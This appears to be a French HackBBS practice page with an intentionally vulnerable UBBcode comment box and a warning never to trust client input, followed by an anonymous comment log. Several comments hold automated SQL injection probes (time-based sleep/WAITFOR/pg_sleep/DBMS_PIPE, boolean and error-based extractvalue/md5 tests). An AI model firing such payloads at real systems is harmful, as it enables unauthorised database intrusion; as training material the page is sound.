[HackBBS] Hack en situation réel
Faille ubbcode en place.
Exemple de ubbCode:
[b]test[/b]
[url=http://hackbbs.org]blah[/url]
[img]http://hackbbs.org/banniere.jpg[/img]
Parser < et > ne suffis pas. Utiliser de l'ubbcode ne suffis pas. Ne jamais faire confiance à ce qui est envoyé par un client!!!
- Anonyme:>maJhgCIXGp
- Anonyme:>maJhgCIXGp
- Anonyme:>maJhgCIXGp
- Anonyme:>maJhgCIXGp
- Anonyme:>maJhgCIXGp
- Anonyme:>maJhgCIXGp
- Anonyme:>maJhgCIXGp
- Anonyme:>maJhgCIXGp
- Anonyme:>maJhgCIXGp
- Anonyme:>maJhgCIXGp
- Anonyme:>maJhgCIXGp
- Anonyme:>maJhgCIXGp
- Anonyme:>maJhgCIXGp
- Anonyme:>maJhgCIXGp
- Anonyme:>maJhgCIXGp
- Anonyme:>maJhgCIXGp
- Anonyme:>maJhgCIXGp
- Anonyme:>maJhgCIXGp
- Anonyme:>maJhgCIXGp
- Anonyme:>maJhgCIXGp
- Anonyme:>maJhgCIXGp
- Anonyme:>maJhgCIXGp
- Anonyme:>maJhgCIXGp
- Anonyme:>maJhgCIXGp'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('w',2)='w
- Anonyme:>maJhgCIXGp'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('y',0)='y
- Anonyme:>maJhgCIXGp'and(select+1)0waitfor/**/delay'0:0:2
- Anonyme:>maJhgCIXGp'and(select+1)0waitfor/**/delay'0:0:0
- Anonyme:>maJhgCIXGp'/**/and(select'1'from/**/pg_sleep(2))'0
- Anonyme:>maJhgCIXGp'/**/and(select'1'from/**/pg_sleep(0))'0
- Anonyme:>maJhgCIXGp"and(select*from(select+sleep(2))a/**/union/**/select+1)="
- Anonyme:>maJhgCIXGp"and(select*from(select+sleep(0))a/**/union/**/select+1)="
- Anonyme:>maJhgCIXGp'and(select*from(select+sleep(2))a/**/union/**/select+1)='
- Anonyme:>maJhgCIXGp'and(select*from(select+sleep(0))a/**/union/**/select+1)='
- Anonyme:>maJhgCIXGp
- Anonyme:>maJhgCIXGp
- Anonyme:>maJhgCIXGp
- Anonyme:>maJhgCIXGp"and"h"="k
- Anonyme:>maJhgCIXGp"and"l"="l
- Anonyme:>maJhgCIXGp'and'w'='c
- Anonyme:>maJhgCIXGp'and'k'='k
- Anonyme:>maJhgCIXGp'"\(
- Anonyme:>maJhgCIXGp鎈'"\(
- Anonyme:>maJhgCIXGp'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1309581494')))'0
- Anonyme:>convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1231372758')))
- Anonyme:>maJhgCIXGp/**/and/**/cast(md5('1099647242')as/**/int)0
- Anonyme:>maJhgCIXGp'and(select'1'from/**/cast(md5(1452626597)as/**/int))'0
- Anonyme:>extractvalue(1,concat(char(126),md5(1960467063)))
- Anonyme:>maJhgCIXGp"and/**/extractvalue(1,concat(char(126),md5(1871007057)))and"
- Anonyme:>maJhgCIXGp'and/**/extractvalue(1,concat(char(126),md5(1368274732)))and'
- Anonyme:>maJhgCIXGp
- Anonyme:>maJhgCIXGp
- Anonyme:>maJhgCIXGp
- Anonyme:>maJhgCIXGp
- Anonyme:>help
- Anonyme:>test
- Anonyme:>
- Anonyme:>
- Anonyme:>bonjour a tous
- Anonyme:>oui quoi
- Anonyme:>img src